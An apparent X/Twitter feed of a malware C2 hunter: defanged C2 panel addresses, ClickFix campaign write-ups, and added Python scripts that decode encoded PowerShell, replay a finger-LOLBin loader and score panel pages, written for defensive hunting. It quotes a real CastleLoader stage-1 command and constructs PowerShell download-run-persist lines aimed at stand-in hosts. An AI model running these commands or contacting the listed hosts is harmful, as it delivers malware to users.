#Malware C2 hunter #infosec passionate. Tweets are my own.

Joined March 2015
Pinned Tweet
8 Dec 2023
Over 10k #malware C2 panels on tracker.viriback.com
Dee retweeted
LKM C2: 103.214.174[.]248:8443, 45.91.81[.]190:8443, 108.61.193[.]37:8443, 45.91.81[.]112
Dee retweeted
From #clickfix to #stealc app.any.run/tasks/9cd9a0f0-b… C2: https://pas.canamrent[.]com/ cc @k3dg3
Dee retweeted
Some panel with title "C2 Panel — Login": https://larpers[.]fun/login "C2 PANEL Command & Control Interface" 🤷‍♂️ @1ZRR4H
Dee retweeted
154.12.236[.]54:5000 chaarlottte[.]dev SHA256: 20056e47d2b3c00e22ff86ba3a7349994112d188fa5045d12b6eb56cd314fbca @500mk500 @ViriBack @skocherhan @AndreGironda @BlinkzSec @JAMESWT_WT @malwrhunterteam @abuse_ch #C2 #panel #ThreatIntel #CTI #BlueTeam For defensive purposes.
Dee retweeted
Fake Microsoft Teams download page using a ClickFix-style fake Chrome update to trick users into executing a malicious PowerShell command. The payload downloads Node.js, executes an obfuscated Update.js file, and establishes persistence using a fake “Microsoft Edge Updates Helper”. IOCs: teams-net-calls[.]com instantwebupdate[.]com #ClickFix #Phishing #Malware #PowerShell @malwrhunterteam @500mk500
May 24
A few C2 panels I don't know what they are... 176.174.36[.]147/ s://167.235.228[.]178/auth/login s://45.80.188[.]4:8081/login 31.57.201[.]43:5000/login
Dee retweeted
#XLoader v0.6.8 👇 http://www.apartuk[.]info/hpum/index.php?account=w4naf290 👇 bazaar.abuse.ch/browse/tag/w…
Dee retweeted
Lucid Stealer being promoted on Telegram. Panels: 85[.]239.155.68, ghdfhfjhfg[.]webhop.me, iloveyoulucid[.]space, 0kt[.]one, storedonutsmp[.]net, lucidstealer[.]one
Dee retweeted
During our routine threat hunting activities, we detected a new active #ClickFix campaign. Typical: what initially appears to be "robot verification" is actually direct malware distribution.

ATTACK CHAIN
1) Fake verification page → 151.243.18[.]254
2) User is prompted to run a PowerShell command
3) The Base64-encoded command script is decoded and connects to the C2 → 94.26.83[.]199
4) Payload is downloaded → /download

CRITICAL POINTS
- The file name changes with each download: "imagetransfer.exe", "audiobackup.exe", "archive_report.exe", "new-photo.exe"
- Each downloaded file has a different name but the same SHA256 hash
- TLS SNI camouflage: "ecs.office.com", "cdn.steamstatic.com"

TECHNICAL BEHAVIORS
Base64 encoding, obfuscation, payload download via PowerShell, %TEMP% drop, silent execution with "-WindowStyle Hidden", console hiding, runtime parsing (GetProcAddress)

CAPABILITIES
Persistence (registry startup), clipboard data collection, webcam access, file system discovery, command execution.

#IOCs
IPs: 151.243.18[.]254, 94.26.83[.]199
Paths: /check, /download
Hash (SHA256): 7d3654531c32d941b8cae81c4137fc542172bfa9635f169cb392f245a0a12bcb
Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

#threathunting #malwareanalysis #powershell #blueteam #soc #dfir #ioc #cyberthreat #cyberthint
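The two ClickFix posts above (the fake Teams page that runs a PowerShell command, and the campaign whose Base64-encoded command fetches a renamed payload from /download) describe the same first stage: a one-liner pasted into Win+R, decoded and executed with a hidden window. The script below is an added example, not code from either post, showing how a hunter decodes such a command line, pulls the indicators worth pivoting on, and collapses rotating file names onto one SHA256. Everything it operates on is constructed: the C2 is the RFC 5737 documentation address 192.0.2.10 and the payload bytes are dummy data.

```python
"""Decode a ClickFix-style encoded PowerShell command and pull out hunting indicators.

Added example, not code from the posts above. Every input is constructed here:
the C2 is the RFC 5737 documentation address 192.0.2.10, and the payload bytes
are dummy data, so the script runs offline.
"""
import base64
import hashlib
import re
from collections import defaultdict
from typing import Optional

# Constructed plaintext of the script a lure would have the victim paste into Win+R.
# It mirrors the behaviours listed in the post: TEMP drop, download, Run-key
# persistence and a hidden window; it is not the real payload.
SCRIPT = (
    '$u="http://192.0.2.10/download";'
    '$p="$env:TEMP\\new-photo.exe";'
    'Invoke-WebRequest -Uri $u -OutFile $p;'
    'Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"'
    ' -Name "PhotoSync" -Value $p;'
    'Start-Process -FilePath $p -WindowStyle Hidden'
)


def encode_for_powershell(script: str) -> str:
    """-EncodedCommand expects Base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
    "-EncodedCommand " + encode_for_powershell(SCRIPT)
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# which is why lures rarely spell it out. -ep and -ExecutionPolicy do not match.
_ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")
_HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b")
_URL = re.compile(r"https?://[^\s'\"<>;]+")
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_RUN_KEY = re.compile(r"(?i)Software\\Microsoft\\Windows\\CurrentVersion\\Run\b")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script if the command line carries -EncodedCommand, else None."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_indicators(cmdline: str) -> dict:
    """Indicators worth pivoting on, from both the outer command line and the decoded script."""
    script = decode_encoded_command(cmdline) or ""
    text = cmdline + "\n" + script
    urls = sorted(set(_URL.findall(text)))
    return {
        "decoded": script,
        "hidden_window": bool(_HIDDEN.search(text)),
        "urls": urls,
        "ips": sorted(set(_IPV4.findall(text))),
        "paths": sorted({"/" + u.split("/", 3)[3] for u in urls if u.count("/") >= 3}),
        "temp_drop": "$env:temp" in script.lower() or "%temp%" in script.lower(),
        "run_key_persistence": bool(_RUN_KEY.search(script)),
    }


def group_by_sha256(samples: dict) -> dict:
    """Map each SHA256 to the names it was served under: a server that renames the
    same file per download still yields one hash, so one hash-based rule covers all."""
    groups = defaultdict(list)
    for name, data in samples.items():
        groups[hashlib.sha256(data).hexdigest()].append(name)
    return {digest: sorted(names) for digest, names in groups.items()}


# Constructed downloads: four rotating names over identical bytes, plus one unrelated file.
_PAYLOAD = b"MZ\x90\x00" + b"constructed-sample-bytes" * 8
SAMPLES = {
    "imagetransfer.exe": _PAYLOAD,
    "audiobackup.exe": _PAYLOAD,
    "archive_report.exe": _PAYLOAD,
    "new-photo.exe": _PAYLOAD,
    "unrelated.exe": b"MZ\x90\x00something-else",
}

if __name__ == "__main__":
    for key, value in extract_indicators(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
    for digest, names in group_by_sha256(SAMPLES).items():
        print(digest[:16], names)
```

The decoder deliberately matches the abbreviated switch forms, since `-enc` and `-e` are what lures actually use; anything that is not valid Base64 or not UTF-16LE is reported as no encoded command rather than as garbage, so the caller can fall back to inspecting the command line itself.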
Dee retweeted
193.169.240[.]81 GhostDesk HVNC control panel @500mk500 @ViriBack @AndreGironda @skocherhan @JAMESWT_WT @BlinkzSec #ThreatIntel #CTI #BlueTeam #GhostDesk #HVNC #C2 #Control #Panel Shared strictly for defensive and research purposes
Dee retweeted
"L0G1N - D4R7H V4D3R": http://65.109.55[.]181:8181/login "4CC3SS D3N13D - 1D3NT1FY Y0URS3LF" "0P3R4D0R" "S3NH4" With such texts, it must be the panel of some sophisticated, complex, APT's malware, right? 😂 🤷‍♂️ @1ZRR4H
Dee retweeted
Unknown C2
Dee retweeted
#govti v4 extractor added. Sample: tria.ge/260508-r267rsdy3m/ More samples: tria.ge/s/family:govti
A panel with title "GOVTI V4 — Login" here: http://103.79.79[.]21:8899/login In the body: "GOVTIv4 Advanced Threat Intelligence" 🤔 😂 🤷‍♂️
Dee retweeted
Finger protocol LOLBin #ClickFix campaign that uses fake AI tools, background removers and LinkedIn lures and injects “finger <username> @ C2” with 12 lure domains containing fake reCAPTCHA, 6 Finger usernames and 6 rotating C2 domains. Details at: bit.ly/3Rmc4Pl
Dee retweeted
Some panel named phantom: http://194.59.31[.]192:8443/ "command and control" 🤷‍♂️
Dee retweeted
Apr 29
> ClickFix -> CastleLoader -> CastleBot using Finger LOLBin
> Stage 1
> "C:\WINDOWS\system32\cmd.exe" /c start "" /min for /f "skip=18 delims=" %T in ('f^^i^^n^^g^^e^^r NjoDPATzUB@cheeshoumreciple[.]com') do %T & echo > 38.146.25[.]206
#malware #clickfix #castleloader #castlebot
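The Finger LOLBin posts above (the campaign summary with rotating finger usernames and C2 domains, and the CastleLoader stage-1 command line) both hinge on the same trick: cmd.exe strips caret escapes before running `finger`, and `for /f "skip=18"` turns whatever the attacker's finger daemon prints after line 18 into commands. The script below is an added example, not tooling from either post, that deobfuscates such a command line, shows the exact bytes that go to TCP/79, and replays the `for /f` semantics over a constructed finger response. The C2 host (RFC 5737 address 192.0.2.20), the username `stage1` and the response text are all hypothetical.

```python
"""Deobfuscate the Finger-LOLBin ClickFix one-liner and replay what its for /f loop would run.

Added example, not tooling from the posts above. The finger response is constructed:
the C2 host is the RFC 5737 address 192.0.2.20 and the username 'stage1' is hypothetical.
"""
import re
from typing import Optional

# Constructed command line in the shape shown in the post, with the reported
# domain and IP replaced by documentation addresses.
SAMPLE_CMDLINE = (
    '"C:\\WINDOWS\\system32\\cmd.exe" /c start "" /min for /f "skip=18 delims=" %T in '
    "('f^^i^^n^^g^^e^^r stage1@192.0.2.20') do %T & echo > 192.0.2.21"
)

# Constructed stand-in for what the attacker's finger daemon returns: 18 lines of
# filler (exactly what skip=18 discards), then the line the loop executes, then
# a blank line and a ';' line, both of which for /f ignores by default.
FINGER_RESPONSE = "\r\n".join(
    [f"Login: stage1    Name: filler line {i}" for i in range(1, 19)]
    + [
        'powershell -w hidden -c "iwr http://192.0.2.20/s2 -OutFile $env:TEMP\\s2.exe; '
        'start $env:TEMP\\s2.exe"',
        "",
        ";eol line, skipped by for /f",
    ]
)


def strip_carets(s: str) -> str:
    """cmd.exe removes one layer of ^ escapes per parsing pass. start runs an internal
    command such as for through a fresh cmd.exe, so the doubled carets survive the
    outer parse and are gone by the time finger runs; a detection that matches the
    literal string 'finger' on the original command line never sees it."""
    return s.replace("^", "")


_FOR_F = re.compile(
    r"""for\s+/f\s+"([^"]*)"\s+(%\w)\s+in\s+\('([^']*)'\)\s+do\s+(.+)""", re.IGNORECASE
)
_FINGER = re.compile(r"(?i)\bfinger\s+(?:/w\s+)?([^@\s]+)@(\S+)")


def parse_for_f(cmdline: str) -> Optional[dict]:
    """Split a `for /f "opts" %V in ('cmd') do body` construct into its parts."""
    m = _FOR_F.search(strip_carets(cmdline))
    if not m:
        return None
    opts = dict(kv.split("=", 1) for kv in m.group(1).split() if "=" in kv)
    return {"options": opts, "var": m.group(2), "command": m.group(3), "body": m.group(4)}


def build_finger_request(user: str, verbose: bool = False) -> bytes:
    """RFC 1288 query: optional /W, the user name, CRLF. This is all that goes to TCP/79."""
    return (("/W " if verbose else "") + user + "\r\n").encode("ascii")


def lines_for_f_executes(output: str, options: dict) -> list:
    """Apply for /f semantics to command output: drop the first skip=N lines, then
    blank lines and lines starting with the eol character (default ';'); with
    delims= empty the whole line is the token, otherwise the first token."""
    skip = int(options.get("skip", 0))
    eol = options.get("eol", ";")
    delims = options.get("delims", " \t")
    tokens = []
    for line in output.splitlines()[skip:]:
        if not line or (eol and line.startswith(eol)):
            continue
        tokens.append(line if delims == "" else re.split(f"[{re.escape(delims)}]+", line, maxsplit=1)[0])
    return tokens


def replay(cmdline: str, finger_output: str) -> dict:
    """Resolve the finger target, the exact request on the wire, and the commands
    the loop body would execute given this response."""
    parsed = parse_for_f(cmdline)
    target = _FINGER.search(parsed["command"])
    user, host = target.group(1), target.group(2)
    executed = [parsed["body"].replace(parsed["var"], tok)
                for tok in lines_for_f_executes(finger_output, parsed["options"])]
    return {"finger_user": user, "finger_host": host,
            "request": build_finger_request(user), "executed": executed}


if __name__ == "__main__":
    for key, value in replay(SAMPLE_CMDLINE, FINGER_RESPONSE).items():
        print(f"{key}: {value}")
```

Two things the replay makes concrete for detection: the outbound request is a bare `username\r\n` to port 79, so a network rule on TCP/79 from workstations catches every variant regardless of how the command line is obfuscated; and the executed command is the attacker's response with the loop body appended, so the server can change the second stage without touching the lure at all.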
Dee retweeted
Some panel with title "SPIDY C2 - Secure Login": https://vayusena[.]online/login "Secure Command & Control Interface" Looks more laughable (especially with the "256-bit AES Encrypted Session" text) than some real serious thing, but still possibly interesting... 🤷‍♂️
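Several of the panel finds above (the "C2 Panel" login, the leetspeak "L0G1N - D4R7H V4D3R" page, "GOVTI V4", "phantom", "SPIDY C2") were spotted the same way: a page's `<title>` and visible text name it as a command-and-control interface. The script below is an added example, not tooling from any of the posts, of that title-and-body check over HTML a scanner has already fetched, with a small leetspeak normalizer so low-effort titles read as plain words. The three pages it scores are constructed to mirror the quoted titles; nothing is fetched.

```python
"""Flag probable C2 panels from fetched HTML by title and visible text.

Added example, not tooling from the posts above. The three pages below are
constructed to mirror the titles quoted in the posts, so nothing is fetched.
"""
import re
from html.parser import HTMLParser

# Term weights; a hit in the <title> counts double because panels name themselves there.
PANEL_TERMS = {
    "command & control": 4,
    "command and control": 4,
    "c2": 3,
    "hvnc": 3,
    "stealer": 3,
    "control panel": 2,
    "panel": 1,
    "login": 1,
    "bots": 1,
}
PANEL_THRESHOLD = 5

# 0->o 1->i 3->e 4->a 5->s 7->t 8->b: enough to read low-effort leetspeak titles.
_LEET = str.maketrans("0134578", "oieastb")


def normalize(s: str) -> str:
    """Lower-case, collapse whitespace and undo leetspeak, so 'L0G1N - D4R7H V4D3R'
    compares as 'login - darth vader'. 'c2' survives because 2 is not mapped."""
    return re.sub(r"\s+", " ", s).strip().lower().translate(_LEET)


class _PageText(HTMLParser):
    """Collect the <title> and the visible text, skipping <script>/<style> bodies."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.chunks = []
        self._in_title = False
        self._hidden = 0

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag in ("script", "style"):
            self._hidden += 1

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag in ("script", "style") and self._hidden:
            self._hidden -= 1

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        elif not self._hidden:
            self.chunks.append(data)


def page_text(html: str) -> tuple:
    """Return (normalized title, normalized visible body text)."""
    p = _PageText()
    p.feed(html)
    p.close()
    return normalize(p.title), normalize(" ".join(p.chunks))


def score_panel(html: str) -> dict:
    """Weighted keyword score over title (x2) and body; returns the hits for triage."""
    title, body = page_text(html)
    hits = {}
    for term, weight in PANEL_TERMS.items():
        points = weight * (2 if term in title else 0) + weight * (1 if term in body else 0)
        if points:
            hits[term] = points
    score = sum(hits.values())
    return {"title": title, "score": score, "hits": hits, "likely_panel": score >= PANEL_THRESHOLD}


# Constructed pages modelled on titles quoted in the posts.
C2_PAGE = """<html><head><title>C2 Panel - Login</title>
<style>body{font:14px sans-serif}</style></head>
<body><h1>C2 PANEL</h1><p>Command &amp; Control Interface</p>
<script>var build = "stealer";</script></body></html>"""
LEET_PAGE = """<html><head><title>L0G1N - D4R7H V4D3R</title></head>
<body><h2>4CC3SS D3N13D - 1D3NT1FY Y0URS3LF</h2>
<label>0P3R4D0R</label><input><label>S3NH4</label><input type="password"></body></html>"""
BLOG_PAGE = """<html><head><title>My Blog - Login</title></head>
<body><p>Welcome back, please log in to post.</p></body></html>"""

if __name__ == "__main__":
    for name, html in (("c2", C2_PAGE), ("leet", LEET_PAGE), ("blog", BLOG_PAGE)):
        print(name, score_panel(html))
```

The leetspeak page is the useful negative case: normalization makes the title and the "operador"/"senha" (Portuguese operator/password) form readable, but the page never calls itself a panel, so keyword scoring alone scores it no higher than a blog login. Pages like that are the reason hunters also pivot on the odd port and the bare /login path rather than on wording.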